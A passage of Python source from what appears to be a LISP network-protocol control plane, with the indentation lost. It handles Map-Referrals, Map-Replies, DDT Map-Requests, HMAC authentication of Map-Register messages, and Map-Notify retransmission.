map_referral.print_map_referral()
incomplete = False
#
# Figure out what action code, EID-prefix, and ttl to return in the EID-
# record. Temporary return requested prefix until we have lisp_ms_compute_
# neg_prefix() working.
#
if (action == LISP_DDT_ACTION_SITE_NOT_FOUND):
eid_prefix, group_prefix, action = lisp_ms_compute_neg_prefix(eid,
group)
ttl = 15
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG): ttl = 1
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
if (action == LISP_DDT_ACTION_DELEGATION_HOLE): ttl = 15
if (action == LISP_DDT_ACTION_NOT_AUTH): ttl = 0
is_ms_peer = False
rloc_count = 0
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry != None):
rloc_count = len(ddt_entry.delegation_set)
is_ms_peer = ddt_entry.is_ms_peer_entry()
ddt_entry.map_referrals_sent += 1
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (is_ms_peer == False)
#endif
#
# Store info in EID-record.
#
eid_record = lisp_eid_record()
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.eid = eid_prefix
eid_record.group= group_prefix
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
#
# Build referral-set.
#
if (rloc_count != 0):
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#endif
#
# Build packet and send Map-Referral message to the source of the
# Map-Request.
#
if (map_request.nonce != 0): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_send_negative_map_reply
#
# Send a negative Map-Reply. This is one with a specific action code and zero
# RLOCs in the locator-set.
#
def lisp_send_negative_map_reply(sockets, eid, group, nonce, dest, port, ttl,
xtr_id, pubsub):
lprint("Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}". \
format(lisp_print_eid_tuple(eid, group), lisp_hex_string(nonce),
red(dest.print_address(), False)))
action = LISP_NATIVE_FORWARD_ACTION if group.is_null() else \
LISP_DROP_ACTION
#
# If this is a crypto-EID, return LISP_SEND_MAP_REQUEST_ACTION.
#
if (lisp_get_eid_hash(eid) != None):
action = LISP_SEND_MAP_REQUEST_ACTION
#endif
packet = lisp_build_map_reply(eid, group, [], nonce, action, ttl, False,
None, False, False)
#
# Send Map-Notify if this Map-Request is a subscribe-request.
#
if (pubsub):
lisp_process_pubsub(sockets, packet, eid, dest, port, nonce, ttl,
xtr_id)
else:
lisp_send_map_reply(sockets, packet, dest, port)
#endif
return
#enddef
#
# lisp_retransmit_ddt_map_request
#
# Have the Map-Resolver transmit a DDT Map-Request.
#
def lisp_retransmit_ddt_map_request(mr):
seid_str = mr.mr_source.print_address()
deid_str = mr.print_eid_tuple()
nonce = mr.nonce
#
# Get referral-node for who we sent Map-Request to last time. We need
# to increment, the no-response timer.
#
if (mr.last_request_sent_to):
last_node = mr.last_request_sent_to.print_address()
ref = lisp_referral_cache_lookup(mr.last_cached_prefix[0],
mr.last_cached_prefix[1], True)
if (ref and ref.referral_set.has_key(last_node)):
ref.referral_set[last_node].no_responses += 1
#endif
#endif
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (mr.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("DDT Map-Request retry limit reached for EID {}, nonce 0x{}". \
format(green(deid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
mr.retry_count += 1
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format(bold("Map-Request", False), "P" if mr.from_pitr else "",
red(mr.itr.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Do referral lookup and send the DDT Map-Request again.
#
lisp_send_ddt_map_request(mr, False)
#
# Restart retransmit timer.
#
mr.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [mr])
mr.retransmit_timer.start()
return
#enddef
#
# lisp_get_referral_node
#
# Get a referral-node of highest priority that is in the up state. Returns
# class lisp_referral_node().
#
def lisp_get_referral_node(referral, source_eid, dest_eid):
#
# Build list of high-priority up referral-nodes.
#
ref_set = []
for ref_node in referral.referral_set.values():
if (ref_node.updown == False): continue
if (len(ref_set) == 0 or ref_set[0].priority == ref_node.priority):
ref_set.append(ref_node)
elif (ref_set[0].priority > ref_node.priority):
ref_set = []
ref_set.append(ref_node)
#endif
#endfor
ref_count = len(ref_set)
if (ref_count == 0): return(None)
hashval = dest_eid.hash_address(source_eid)
hashval = hashval % ref_count
return(ref_set[hashval])
#enddef
#
# lisp_send_ddt_map_request
#
# Send a DDT Map-Request based on a EID lookup in the referral cache.
#
def lisp_send_ddt_map_request(mr, send_to_root):
lisp_sockets = mr.lisp_sockets
nonce = mr.nonce
itr = mr.itr
mr_source = mr.mr_source
eid_str = mr.print_eid_tuple()
#
# Check if the maximum allowable Map-Requests have been sent for this
# map-request-queue entry.
#
if (mr.send_count == 8):
lprint("Giving up on map-request-queue entry {}, nonce 0x{}".format( \
green(eid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
#
# If caller wants us to use the root versus best match lookup. We only
# so this once per Map-Request queue entry.
#
if (send_to_root):
lookup_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
lookup_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
mr.tried_root = True
lprint("Jumping up to root for EID {}".format(green(eid_str, False)))
else:
lookup_eid = mr.eid
lookup_group = mr.group
#endif
#
# Do longest match on EID into DDT referral cache.
#
referral = lisp_referral_cache_lookup(lookup_eid, lookup_group, False)
if (referral == None):
lprint("No referral cache entry found")
lisp_send_negative_map_reply(lisp_sockets, lookup_eid, lookup_group,
nonce, itr, mr.sport, 15, None, False)
return
#endif
ref_str = referral.print_eid_tuple()
lprint("Found referral cache entry {}, referral-type: {}".format(ref_str,
referral.print_referral_type()))
ref_node = lisp_get_referral_node(referral, mr_source, mr.eid)
if (ref_node == None):
lprint("No reachable referral-nodes found")
mr.dequeue_map_request()
lisp_send_negative_map_reply(lisp_sockets, referral.eid,
referral.group, nonce, itr, mr.sport, 1, None, False)
return
#endif
lprint("Send DDT Map-Request to {} {} for EID {}, nonce 0x{}". \
format(ref_node.referral_address.print_address(),
referral.print_referral_type(), green(eid_str, False),
lisp_hex_string(nonce)))
#
# Encapsulate Map-Request and send out.
#
to_ms = (referral.referral_type == LISP_DDT_ACTION_MS_REFERRAL or
referral.referral_type == LISP_DDT_ACTION_MS_ACK)
lisp_send_ecm(lisp_sockets, mr.packet, mr_source, mr.sport, mr.eid,
ref_node.referral_address, to_ms=to_ms, ddt=True)
#
# Do some stats.
#
mr.last_request_sent_to = ref_node.referral_address
mr.last_sent = lisp_get_timestamp()
mr.send_count += 1
ref_node.map_requests_sent += 1
return
#enddef
#
# lisp_mr_process_map_request
#
# Process a Map-Request received by an ITR. We need to forward this Map-Request
# to the longest matched referral from the referral-cache.
#
def lisp_mr_process_map_request(lisp_sockets, packet, map_request, ecm_source,
sport, mr_source):
eid = map_request.target_eid
group = map_request.target_group
deid_str = map_request.print_eid_tuple()
seid_str = mr_source.print_address()
nonce = map_request.nonce
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format("P" if map_request.pitr_bit else "",
red(ecm_source.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Queue the Map-Request. We need to reliably transmit it.
#
mr = lisp_ddt_map_request(lisp_sockets, packet, eid, group, nonce)
mr.packet = packet
mr.itr = ecm_source
mr.mr_source = mr_source
mr.sport = sport
mr.from_pitr = map_request.pitr_bit
mr.queue_map_request()
lisp_send_ddt_map_request(mr, False)
return
#enddef
#
# lisp_process_map_request
#
# Process received Map-Request as a Map-Server or an ETR.
#
def lisp_process_map_request(lisp_sockets, packet, ecm_source, ecm_port,
mr_source, mr_port, ddt_request, ttl):
orig_packet = packet
map_request = lisp_map_request()
packet = map_request.decode(packet, mr_source, mr_port)
if (packet == None):
lprint("Could not decode Map-Request packet")
return
#endif
map_request.print_map_request()
#
# If RLOC-probe request, process separately.
#
if (map_request.rloc_probe):
lisp_process_rloc_probe_request(lisp_sockets, map_request,
mr_source, mr_port, ttl)
return
#endif
#
# Process SMR.
#
if (map_request.smr_bit):
lisp_process_smr(map_request)
#endif
#
# Process SMR-invoked Map-Request.
#
if (map_request.smr_invoked_bit):
lisp_process_smr_invoked_request(map_request)
#endif
#
# Do ETR processing of the Map-Request if we found a database-mapping.
#
if (lisp_i_am_etr):
lisp_etr_process_map_request(lisp_sockets, map_request, mr_source,
mr_port, ttl)
#endif
#
# Do Map-Server processing of the Map-Request.
#
if (lisp_i_am_ms):
packet = orig_packet
eid, group, ddt_action = lisp_ms_process_map_request(lisp_sockets,
orig_packet, map_request, mr_source, mr_port, ecm_source)
if (ddt_request):
lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source,
ecm_port, ddt_action, eid, group)
#endif
return
#endif
#
# Map-Request is from an ITR destined to a Map-Resolver.
#
if (lisp_i_am_mr and not ddt_request):
lisp_mr_process_map_request(lisp_sockets, orig_packet, map_request,
ecm_source, mr_port, mr_source)
#endif
#
# Do DDT-node processing of the Map-Request.
#
if (lisp_i_am_ddt or ddt_request):
packet = orig_packet
lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source,
ecm_port)
#endif
return
#enddef
#
# lisp_store_mr_stats
#
# Store counter and timing stats for the map-resolver that just sent us a
# negative Map-Reply.
#
def lisp_store_mr_stats(source, nonce):
mr = lisp_get_map_resolver(source, None)
if (mr == None): return
#
# Count and record timestamp.
#
mr.neg_map_replies_received += 1
mr.last_reply = lisp_get_timestamp()
#
# For every 100 replies, reset the total_rtt so we can get a new average.
#
if ((mr.neg_map_replies_received % 100) == 0): mr.total_rtt = 0
#
# If Map-Reply matches stored nonce, then we can do an RTT calculation.
#
if (mr.last_nonce == nonce):
mr.total_rtt += (time.time() - mr.last_used)
mr.last_nonce = 0
#endif
if ((mr.neg_map_replies_received % 10) == 0): mr.last_nonce = 0
return
#enddef
#
# lisp_process_map_reply
#
# Process received Map-Reply.
#
def lisp_process_map_reply(lisp_sockets, packet, source, ttl):
global lisp_map_cache
map_reply = lisp_map_reply()
packet = map_reply.decode(packet)
if (packet == None):
lprint("Could not decode Map-Reply packet")
return
#endif
map_reply.print_map_reply()
#
# Process each EID record in Map-Reply message.
#
rloc_key_change = None
for i in range(map_reply.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Reply packet")
return
#endif
eid_record.print_record(" ", False)
#
# If negative Map-Reply, see if from a Map-Resolver, do some counting
# and timing stats.
#
if (eid_record.rloc_count == 0):
lisp_store_mr_stats(source, map_reply.nonce)
#endif
multicast = (eid_record.group.is_null() == False)
#
# If this is a (0.0.0.0/0, G) with drop-action, we don't want to
# cache more-specific (S,G) entry. It is a startup timing problem.
#
if (lisp_decent_push_configured):
action = eid_record.action
if (multicast and action == LISP_DROP_ACTION):
if (eid_record.eid.is_local()): continue
#endif
#endif
#
# Some RLOC-probe Map-Replies may have no EID value in the EID-record.
# Like from RTRs or PETRs.
#
if (eid_record.eid.is_null()): continue
#
# Do not lose state for other RLOCs that may be stored in an already
# cached map-cache entry.
#
if (multicast):
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
else:
mc = lisp_map_cache.lookup_cache(eid_record.eid, True)
#endif
new_mc = (mc == None)
#
# Process each RLOC record in EID record.
#
rloc_set = []
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
rloc_record.keys = map_reply.keys
packet = rloc_record.decode(packet, map_reply.nonce)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Reply packet")
return
#endif
rloc_record.print_record(" ")
old_rloc = None
if (mc): old_rloc = mc.get_rloc(rloc_record.rloc)
if (old_rloc):
rloc = old_rloc
else:
rloc = lisp_rloc()
#endif
#
# Copy RLOC data from record, add to locator-set. Check to see
# if the RLOC has been translated by a NAT. If so, go get the
# translated port and store in rloc entry.
#
port = rloc.store_rloc_from_record(rloc_record, map_reply.nonce,
source)
rloc.echo_nonce_capable = map_reply.echo_nonce_capable
if (rloc.echo_nonce_capable):
addr_str = rloc.rloc.print_address_no_iid()
if (lisp_get_echo_nonce(None, addr_str) == None):
lisp_echo_nonce(addr_str)
#endif
#endif
#
# Process state for RLOC-probe reply from this specific RLOC. And
# update RLOC state for map-cache entry. Ignore an RLOC with a
# different address-family of the recieved packet. The ITR really
# doesn't know it can reach the RLOC unless it probes for that
# address-family.
#
if (map_reply.rloc_probe and rloc_record.probe_bit):
if (rloc.rloc.afi == source.afi):
lisp_process_rloc_probe_reply(rloc.rloc, source, port,
map_reply.nonce, map_reply.hop_count, ttl)
#endif
#endif
#
# Append to rloc-set array to be stored in map-cache entry.
#
rloc_set.append(rloc)
#
# Did keys change for thie RLOC, flag it if so.
#
if (lisp_data_plane_security and rloc.rloc_recent_rekey()):
rloc_key_change = rloc
#endif
#endfor
#
# If the map-cache entry is for an xTR behind a NAT, we'll find an
# RTR RLOC (which is priority 254). Store private RLOCs that may
# come along with the RTR RLOC because the destination RLOC could
# be behind the same NAT as this ITR. This ITR, however could be
# behind another NAT or in public space. We want to mark the
# private address RLOC unreachable for the two later cases.
#
if (map_reply.rloc_probe == False and lisp_nat_traversal):
new_set = []
log_set = []
for rloc in rloc_set:
#
# Set initial state for private RLOCs to UNREACH and test
# with RLOC-probes if up behind same NAT.
#
if (rloc.rloc.is_private_address()):
rloc.priority = 1
rloc.state = LISP_RLOC_UNREACH_STATE
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
continue
#endif
#
# RTR should not put RTR RLOC in map-cache. But xTRs do. None
# RTR RLOCs should only go in the RTR map-cache.
#
if (rloc.priority == 254 and lisp_i_am_rtr == False):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
if (rloc.priority != 254 and lisp_i_am_rtr):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
#endfor
if (log_set != []):
rloc_set = new_set
lprint("NAT-traversal optimized RLOC-set: {}".format(log_set))
#endif
#endif
#
# If any RLOC-records do not have RLOCs, don't put them in the map-
# cache.
#
new_set = []
for rloc in rloc_set:
if (rloc.json != None): continue
new_set.append(rloc)
#endfor
if (new_set != []):
count = len(rloc_set) - len(new_set)
lprint("Pruning {} no-address RLOC-records for map-cache".format( \
count))
rloc_set = new_set
#endif
#
# If this is an RLOC-probe reply and the RLOCs are registered with
# merge semantics, this Map-Reply may not include the other RLOCs.
# In this case, do not wipe out the other RLOCs. Get them from the
# existing entry.
#
if (map_reply.rloc_probe and mc != None): rloc_set = mc.rloc_set
#
# If we are overwriting the rloc-set cached in the map-cache entry,
# then remove the old rloc pointers from the RLOC-probe list.
#
rloc_set_change = new_mc
if (mc and rloc_set != mc.rloc_set):
mc.delete_rlocs_from_rloc_probe_list()
rloc_set_change = True
#endif
#
# Add to map-cache. If this is a replace, save uptime.
#
uptime = mc.uptime if (mc) else None
mc = lisp_mapping(eid_record.eid, eid_record.group, rloc_set)
mc.mapping_source = source
mc.map_cache_ttl = eid_record.store_ttl()
mc.action = eid_record.action
mc.add_cache(rloc_set_change)
add_or_replace = "Add"
if (uptime):
mc.uptime = uptime
add_or_replace = "Replace"
#endif
lprint("{} {} map-cache with {} RLOCs".format(add_or_replace,
green(mc.print_eid_tuple(), False), len(rloc_set)))
#
# If there were any changes to the RLOC-set or the keys for any
# existing RLOC in the RLOC-set, tell the external data-plane.
#
if (lisp_ipc_dp_socket and rloc_key_change != None):
lisp_write_ipc_keys(rloc_key_change)
#endif
#
# Send RLOC-probe to highest priority RLOCs if this is a new map-cache
# entry. But if any of the RLOCs were used before in other map-cache
# entries, no need to send RLOC-probes.
#
if (new_mc):
probe = bold("RLOC-probe", False)
for rloc in mc.best_rloc_set:
addr_str = red(rloc.rloc.print_address_no_iid(), False)
lprint("Trigger {} to {}".format(probe, addr_str))
lisp_send_map_request(lisp_sockets, 0, mc.eid, mc.group, rloc)
#endfor
#endif
#endfor
return
#enddef
#
# lisp_compute_auth
#
# Create HMAC hash from packet contents store in lisp_map_register() and
# encode in packet buffer.
#
def lisp_compute_auth(packet, map_register, password):
if (map_register.alg_id == LISP_NONE_ALG_ID): return(packet)
packet = map_register.zero_auth(packet)
hashval = lisp_hash_me(packet, map_register.alg_id, password, False)
#
# Store packed hash value in lisp_map_register().
#
map_register.auth_data = hashval
packet = map_register.encode_auth(packet)
return(packet)
#enddef
#
# lisp_hash_me
#
# Call HMAC hashing code from multiple places. Returns hash value.
#
def lisp_hash_me(packet, alg_id, password, do_hex):
if (alg_id == LISP_NONE_ALG_ID): return(True)
if (alg_id == LISP_SHA_1_96_ALG_ID):
hashalg = hashlib.sha1
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
hashalg = hashlib.sha256
#endif
if (do_hex):
hashval = hmac.new(password, packet, hashalg).hexdigest()
else:
hashval = hmac.new(password, packet, hashalg).digest()
#endif
return(hashval)
#enddef
#
# lisp_verify_auth
#
# Compute sha1 or sha2 hash over Map-Register packet and compare with one
# transmitted in packet that is stored in class lisp_map_register.
#
def lisp_verify_auth(packet, alg_id, auth_data, password):
if (alg_id == LISP_NONE_ALG_ID): return(True)
hashval = lisp_hash_me(packet, alg_id, password, True)
matched = (hashval == auth_data)
#
# Print differences if hashes if they do not match.
#
if (matched == False):
lprint("Hashed value: {} does not match packet value: {}".format( \
hashval, auth_data))
#endif
return(matched)
#enddef
#
# lisp_retransmit_map_notify
#
# Retransmit the already build Map-Notify message.
#
def lisp_retransmit_map_notify(map_notify):
dest = map_notify.etr
port = map_notify.etr_port
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (map_notify.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("Map-Notify with nonce 0x{} retry limit reached for ETR {}". \
format(map_notify.nonce_key, red(dest.print_address(), False)))
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
try:
lisp_map_notify_queue.pop(key)
except:
lprint("Key not found in Map-Notify queue")
#endtry
#endif
return
#endif
lisp_sockets = map_notify.lisp_sockets
map_notify.retry_count += 1
lprint("Retransmit {} with nonce 0x{} to xTR {}, retry {}".format( \
bold("Map-Notify", False), map_notify.nonce_key,
red(dest.print_address(), False), map_notify.retry_count))
lisp_send_map_notify(lisp_sockets, map_notify.packet, dest, port)
if (map_notify.site): map_notify.site.map_notifies_sent += 1
#
# Restart retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_merged_map_notify
#
# Send Map-Notify with a merged RLOC-set to each ETR in the RLOC-set.
#
def lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record):
#
# Build EID-record once.
#
eid_record.rloc_count = len(parent.registered_rlocs)
packet_record = eid_record.encode()
eid_record.print_record("Merged Map-Notify ", False)
#
# Buld RLOC-records for merged RLOC-set.
#
for xtr in parent.registered_rlocs:
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(xtr)
packet_record += rloc_record.encode()
rloc_record.print_record(" ")
del(rloc_record)
#endfor
#
# Build Map-Notify for each xTR that needs to receive the Map-Notify.
#
for xtr in parent.registered_rlocs:
dest = xtr.rloc
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
key_id = map_register.key_id
map_notify.key_id = key_id
map_notify.alg_id = map_register.alg_id
map_notify.auth_len = map_register.auth_len
map_notify.nonce = map_register.nonce
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(dest)
map_notify.etr_port = map_register.sport
map_notify.site = parent.site
packet = map_notify.encode(packet_record, parent.site.auth_key[key_id])
map_notify.print_notify()
#
# Put Map-Notify state on retransmission queue.
#
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
remove = lisp_map_notify_queue[key]
remove.retransmit_timer.cancel()
del(remove)
#endif
lisp_map_notify_queue[key] = map_notify
#
# Send out.
#
lprint("Send merged Map-Notify to ETR {}".format( \
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
parent.site.map_notifies_sent += 1
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
#endfor
return
#enddef
#
# lisp_build_map_notify
#
# Setup retransmission queue entry to send the first Map-Notify.
#
def lisp_build_map_notify(lisp_sockets, eid_records, eid_list, record_count,
source, port, nonce, key_id, alg_id, auth_len, site, map_register_ack):
key = lisp_hex_string(nonce) + source.print_address()
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
s = red(source.print_address_no_iid(), False)
lprint("Map-Notify with nonce 0x{} pending for xTR {}".format( \
lisp_hex_string(map_notify.nonce), s))
return
#endif
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = record_count
key_id = key_id
map_notify.key_id = key_id
map_notify.alg_id = alg_id
map_notify.auth_len = auth_len
map_notify.nonce = nonce
map_notify.nonce_key = lisp_hex_string(nonce)
map_notify.etr.copy_address(source)
map_notify.etr_port = port
map_notify.site = site
map_notify.eid_list = eid_list
#
# Put Map-Notify state on retransmission queue.
#
if (map_register_ack == False):
key = map_notify.nonce_key
lisp_map_notify_queue[key] = map_notify
#endif
if (map_register_ack):
lprint("Send Map-Notify to ack Map-Register")
else:
lprint("Send Map-Notify for RLOC-set change")
#endif
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, site.auth_key[key_id])
map_notify.print_notify()
if (map_register_ack == False):
eid_record = lisp_eid_record()
eid_record.decode(eid_records)
eid_record.print_record(" ", False)
#endif
#
# Send out.
#
lisp_send_map_notify(lisp_sockets, packet, map_notify.etr, port)
site.map_notifies_sent += 1
if (map_register_ack): return
#
# Set retransmit timer if this is an unsolcited Map-Notify. Otherwise,
# we are acknowledging a Map-Register and the registerer is not going
# to send a Map-Notify-Ack so we shouldn't expect one.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_map_notify_ack
#
# Change Map-Notify message to have a new type (Map-Notify-Ack) and
# reauthenticate message.
#
def lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms):
map_notify.map_notify_ack = True
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, ms.password)
map_notify.print_notify()
#
# Send the Map-Notify-Ack.
#
dest = ms.map_server
lprint("Send Map-Notify-Ack to {}".format(
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_multicast_map_notify
#
# Send a Map-Notify message to an xTR for the supplied (S,G) passed into this
# function.
#
def lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list, xtr):
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
map_notify.nonce = lisp_get_control_nonce()
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(xtr)
map_notify.etr_port = LISP_CTRL_PORT
map_notify.eid_list = eid_list
key = map_notify.nonce_key
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(map_notify.eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
lprint("Map-Notify with nonce 0x{} pending for ITR {}".format( \
map_notify.nonce, red(xtr.print_address_no_iid(), False)))
return
#endif
#
# Put Map-Notify state on retransmission queue.
#
lisp_map_notify_queue[key] = map_notify
#
# Determine if there are any RTRs in the RLOC-set for this (S,G).
#
rtrs_exist = site_eid.rtrs_in_rloc_set()
if (rtrs_exist):
if (site_eid.is_rtr_in_rloc_set(xtr)): rtrs_exist = False
#endif
#
# Build EID-record.
#
eid_record = lisp_eid_record()
eid_record.record_ttl = 1440
eid_record.eid.copy_address(site_eid.eid)
eid_record.group.copy_address(site_eid.group)
eid_record.rloc_count = 0
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
eid_record.rloc_count += 1
#endfor
packet = eid_record.encode()
#
# Print contents of Map-Notify.
#
map_notify.print_notify()
eid_record.print_record(" ", False)
#
# Build locator-set with only RTR RLOCs if they exist.
#
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(rloc_entry)
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#
# Encode it.
#
packet = map_notify.encode(packet, "")
if (packet == None): return
#
# Send Map-Notify to xtR.
#
lisp_send_map_notify(lisp_sockets, packet, xtr, LISP_CTRL_PORT)
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_queue_multicast_map_notify
#
# This funciton will look for the ITRs in the local site cache.
#
def lisp_queue_multicast_map_notify(lisp_sockets, rle_list):
null_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
for sg in rle_list:
sg_site_eid = lisp_site_eid_lookup(sg[0], sg[1], True)
if (sg_site_eid == None): continue
#
# (S,G) RLOC-set could be empty when last RLE goes away. We will have
# to search all individual registrations searching for RTRs.
#
# We store in a dictonary array so we can remove duplicates.
#
sg_rloc_set = sg_site_eid.registered_rlocs
if (len(sg_rloc_set) == 0):
temp_set = {}
for se in sg_site_eid.individual_registrations.values():
for rloc_entry in se.registered_rlocs:
if (rloc_entry.is_rtr() == False): continue
temp_set[rloc_entry.rloc.print_address()] = rloc_entry
#endfor
#endfor
sg_rloc_set = temp_set.values()
#endif
#
# If this is a (0.0.0.0/0, G) or a (0::/0, G), we send a Map-Notify
# to all members (all RLOCs in the sg_rloc_set.
#
notify = []
found_rtrs = False
if (sg_site_eid.eid.address == 0 and sg_site_eid.eid.mask_len == 0):
notify_str = []
rle_nodes = [] if len(sg_rloc_set) == 0 else \
sg_rloc_set[0].rle.rle_nodes
for rle_node in rle_nodes:
notify.append(rle_node.address)
notify_str.append(rle_node.address.print_address_no_iid())
#endfor
lprint("Notify existing RLE-nodes {}".format(notify_str))
else:
#
# If the (S,G) has an RTR registered, then we will send a
# Map-Notify to the RTR instead the ITRs of the source-site.
#
for rloc_entry in sg_rloc_set:
if (rloc_entry.is_rtr()): notify.append(rloc_entry.rloc)
#endfor
#
# If no RTRs were found, get ITRs from source-site.
#
found_rtrs = (len(notify) != 0)
if (found_rtrs == False):
site_eid = lisp_site_eid_lookup(sg[0], null_group, False)
if (site_eid == None): continue
for rloc_entry in site_eid.registered_rlocs:
if (rloc_entry.rloc.is_null()): continue
notify.append(rloc_entry.rloc)
#endfor
#endif
#
# No ITRs or RTRs fond.
#
if (len(notify) == 0):
lprint("No ITRs or RTRs found for {}, Map-Notify suppressed". \
format(green(sg_site_eid.print_eid_tuple(), False)))
continue
#endif
#endif
#
# Send multicast Map-Notify to either ITR-list or RTR-list.
#
for xtr in notify:
lprint("Build Map-Notify to {}TR {} for {}".format("R" if \
found_rtrs else "x", red(xtr.print_address_no_iid(), False),
green(sg_site_eid.print_eid_tuple(), False)))
el = [sg_site_eid.print_eid_tuple()]
lisp_send_multicast_map_notify(lisp_sockets, sg_site_eid, el, xtr)
time.sleep(.001)
#endfor
#endfor
return
#enddef
#
# lisp_find_sig_in_rloc_set
#
# Look for a "signature" key in a JSON RLOC-record. Return None, if not found.
# Return RLOC record if found.
#
def lisp_find_sig_in_rloc_set(packet, rloc_count):
for i in range(rloc_count):
rloc_record = lisp_rloc_record()
packet = rloc_record.decode(packet, None)
json_sig = rloc_record.json
if (json_sig == None): continue
try:
json_sig = json.loads(json_sig.json_string)
except:
lprint("Found corrupted JSON signature")
continue
#endtry
if (json_sig.has_key("signature") == False): continue
return(rloc_record)
#endfor
return(None)
#enddef
#
# lisp_get_eid_hash
#
# From an EID, return EID hash value. Here is an example where all but the
# high-order byte is the EID hash for each hash-length:
#
# EID: fd4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430
# EID-hash: 4f:5b9f:f67c:6dbd:3799:48e1:c6a2:9430 eid_hash_len = 120
# EID-hash: 6dbd:3799:48e1:c6a2:9430 eid_hash_len = 80
#
# Note when an eid-prefix in lisp_eid_hashes[] has an instance-id of -1, it
# means the eid-prefix is used for all EIDs from any instance-id.
#
# Returns a string with hex digits between colons and the hash length in bits.
